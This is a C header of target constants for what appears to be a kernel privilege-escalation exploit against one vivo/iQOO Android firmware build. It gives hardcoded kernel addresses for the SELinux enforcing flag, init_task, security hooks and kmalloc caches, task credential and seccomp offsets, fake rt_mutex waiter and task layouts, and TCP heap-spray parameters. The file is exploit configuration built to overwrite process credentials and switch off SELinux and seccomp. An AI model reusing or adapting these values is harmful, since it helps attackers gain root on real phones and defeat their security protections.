#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "pd2339_bp2a_250605_031_a3_iqoo_neo9s_pro"
#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT "vivo/PD2339M/PD2339:16/BP2A.250605.031.A3/compiler260609184934:user/release-keys"
#endif

#define MM_STRUCT_SZ 0x400
#define MM_ORDER 3
#define MM_PARTIALS 5

#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x40000000ULL
#define P0_KERNEL_PHYS_LOAD 0x40000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff8400000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffffc000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

#define PSELECT_WAITER_WORD_SHIFT 1

#define USE_TCP_ROUTE
#define TCP_SPRAY_LEVEL IPPROTO_IPV6
#ifndef TCP_GSR_OPTNAME
#define TCP_GSR_OPTNAME 46
#endif
#define TCP_GSR_BUF_SIZE 0x108
#define TCP_GSR_WAITER_SHIFT 0x78
#define SLIDE_TCP_ROUTE_ATTEMPTS 2000
#define SLIDE_TCP_ROUTE_ARM_SEQ 4
#define SLIDE_TCP_POST_HOLD 0

#define TCP_GSR_TREE_PC_OFF (TCP_GSR_WAITER_SHIFT + 0x00)
#define TCP_GSR_TREE_RIGHT_OFF (TCP_GSR_WAITER_SHIFT + 0x08)
#define TCP_GSR_TREE_LEFT_OFF (TCP_GSR_WAITER_SHIFT + 0x10)
#define TCP_GSR_PI0_OFF (TCP_GSR_WAITER_SHIFT + 0x18)
#define TCP_GSR_PI1_OFF (TCP_GSR_WAITER_SHIFT + 0x20)
#define TCP_GSR_PI2_OFF (TCP_GSR_WAITER_SHIFT + 0x28)
#define TCP_GSR_TASK_OFF (TCP_GSR_WAITER_SHIFT + 0x30)
#define TCP_GSR_LOCK_OFF (TCP_GSR_WAITER_SHIFT + 0x38)
#define TCP_GSR_WAKE_STATE_OFF (TCP_GSR_WAITER_SHIFT + 0x40)
#define TCP_GSR_PRIO_OFF (TCP_GSR_WAITER_SHIFT + 0x44)
#define TCP_GSR_DEADLINE_OFF (TCP_GSR_WAITER_SHIFT + 0x48)
#define TCP_GSR_WW_CTX_OFF (TCP_GSR_WAITER_SHIFT + 0x50)

#define ASHMEM_MISC_FOPS_OFF 0x01231e00ULL
#define ASHMEM_FOPS_OFF 0x01291388ULL
#define ASHMEM_IOCTL_OFF 0x00ca77ccULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x00ca80f4ULL
#define ASHMEM_MMAP_OFF 0x00ca814cULL
#define ASHMEM_OPEN_OFF 0x00ca8370ULL
#define ASHMEM_RELEASE_OFF 0x00ca8410ULL
#define ASHMEM_SHOW_FDINFO_OFF 0x00ca8498ULL
#define CONFIGFS_READ_ITER_OFF 0x004c1a0cULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x004c1f3cULL
#define COPY_SPLICE_READ_OFF 0x00441f78ULL
#define NOOP_LLSEEK_OFF 0x003f44ccULL
#define INIT_TASK_OFF 0x0210fb40ULL
#define INIT_UTS_NS_OFF 0x022e3680ULL
#define EMPTY_ZERO_PAGE_OFF 0x02343000ULL
#define ROOT_TASK_GROUP_OFF 0x0234a740ULL
#define SELINUX_BLOB_SIZES_OFF 0x016333c0ULL
#define SELINUX_ENFORCING_OFF 0x0247f298ULL
#define SECURITY_HOOK_HEADS_OFF 0x01632cb0ULL
#define KMALLOC_CACHES_OFF 0x016327e8ULL
#define ANON_PIPE_BUF_OPS_OFF 0x01119550ULL
#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_UTS_NS (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define EMPTY_ZERO_PAGE (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

#define SLIDE_NFULNL_LOGGER_OFF 0x02102ee0ULL
#define SLIDE_LOGGERS_0_1_OFF 0x02102e30ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x024a0890ULL
#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
#define SLIDE_SYSCTL_BOOTID_OFF 0x024a0890ULL

#define SLIDE_NFULNL_LOGGER_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)
#define SLIDE_SELINUX_STATE_OFF 0x0247f298ULL
#define SLIDE_KPTR_RESTRICT_OFF 0x0210d578ULL
#define SLIDE_SELINUX_STATE P0_DATA_ALIAS_CONST(KIMAGE_TEXT_BASE + SLIDE_SELINUX_STATE_OFF)
#define SLIDE_KPTR_RESTRICT P0_DATA_ALIAS_CONST(KIMAGE_TEXT_BASE + SLIDE_KPTR_RESTRICT_OFF)
#define ASHMEM_MISC_FOPS_SLOT_OFF 0x022bb740ULL
#define ASHMEM_FOPS_STRUCT_OFF 0x01291388ULL
#define ASHMEM_MISC_FOPS_SLOT P0_DATA_ALIAS_CONST(KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_SLOT_OFF)
#define ASHMEM_FOPS_STRUCT P0_DATA_ALIAS_CONST(KIMAGE_TEXT_BASE + ASHMEM_FOPS_STRUCT_OFF)
#define SLIDE_BSS_LOCK_OFF 0x0248BF60ULL
#define SLIDE_BSS_LOCK P0_DATA_ALIAS_CONST(KIMAGE_TEXT_BASE + SLIDE_BSS_LOCK_OFF)

#define SLIDE_BSS_SAFE_TASK P0_DATA_ALIAS_CONST(KIMAGE_TEXT_BASE + SLIDE_BSS_LOCK_OFF - 0xF60)

#define LOCK_OFF 0x1350
#define W0_OFF 0x2220
#define FOPS_OFF 0x1000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200

#define SLIDE_LEAK_T_OFF 0x021118b0ULL
#define SLIDE_LEAK_T P0_DATA_ALIAS_CONST(KIMAGE_TEXT_BASE + SLIDE_LEAK_T_OFF)
#define SLIDE_LEAK_P_OFF 0x01632118ULL

#define WAITER_LOCAL_OFF 0x80
#define WAITER_TREE_ENTRY_OFF 0x00
#define WAITER_PI_TREE_ENTRY_OFF 0x18
#define WAITER_TASK_OFF 0x30
#define WAITER_LOCK_OFF 0x38
#define WAITER_WAKE_STATE_OFF 0x40
#define WAITER_PRIO_OFF 0x44
#define WAITER_DEADLINE_OFF 0x48
#define WAITER_WW_CTX_OFF 0x50

#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x40
#define FAKE_WAITER_PRIO_OFF 0x44
#define FAKE_WAITER_DEADLINE_OFF 0x48
#define FAKE_WAITER_WW_CTX_OFF 0x50

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x924
#define FAKE_TASK_PI_WAITERS_OFF 0x938
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950

#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100
#define CFG_NAME_BIAS 11
#define CFG_PREFIX_COUNT 0x6d6873612f766564ULL

#define MM_OWNER_OFF 0x338

#define TASK_PID_OFF 0x630
#define TASK_TGID_OFF 0x634
#define TASK_REAL_PARENT_OFF 0x640
#define TASK_ATOMIC_FLAGS_OFF 0x5f0
#define TASK_REAL_CRED_OFF 0x830
#define TASK_CRED_OFF 0x838
#define TASK_COMM_OFF 0x848
#define TASK_TASKS_OFF 0x550
#define TASK_THREAD_GROUP_OFF 0x6e0
#define TASK_PI_LOCK_OFF 0x924
#define TASK_PI_WAITERS_OFF 0x938
#define TASK_PI_TOP_TASK_OFF 0x948
#define TASK_PI_BLOCKED_ON_OFF 0x950
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x900

#define CRED_UID_OFF 4
#define CRED_SECUREBITS_OFF 36
#define CRED_CAPS_OFF 40
#define CRED_SECURITY_OFF 120
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x18
#define STRUCT_PAGE_TYPE_OFF 0x30

#define PIPE_BUFFER_SIZE 0x28
#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
#define PIPE_INODE_INFO_STRUCT_SIZE 0xb8
#define PIPE_INODE_INFO_SIZE 0xc0
#define PIPE_INODE_INFO_SLOTS_PER_PAGE 21
#define PIPE_HEAD_OFF 0x60
#define PIPE_TAIL_OFF 0x64
#define PIPE_MAX_USAGE_OFF 0x68
#define PIPE_RING_SIZE_OFF 0x6c
#define PIPE_NR_ACCOUNTED_OFF 0x70
#define PIPE_READERS_OFF 0x74
#define PIPE_WRITERS_OFF 0x78
#define PIPE_FILES_OFF 0x7c
#define PIPE_TMP_PAGE_OFF 0x90
#define PIPE_BUFS_OFF 0xa8
#define PIPE_USER_OFF 0xb0

#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0

#endif
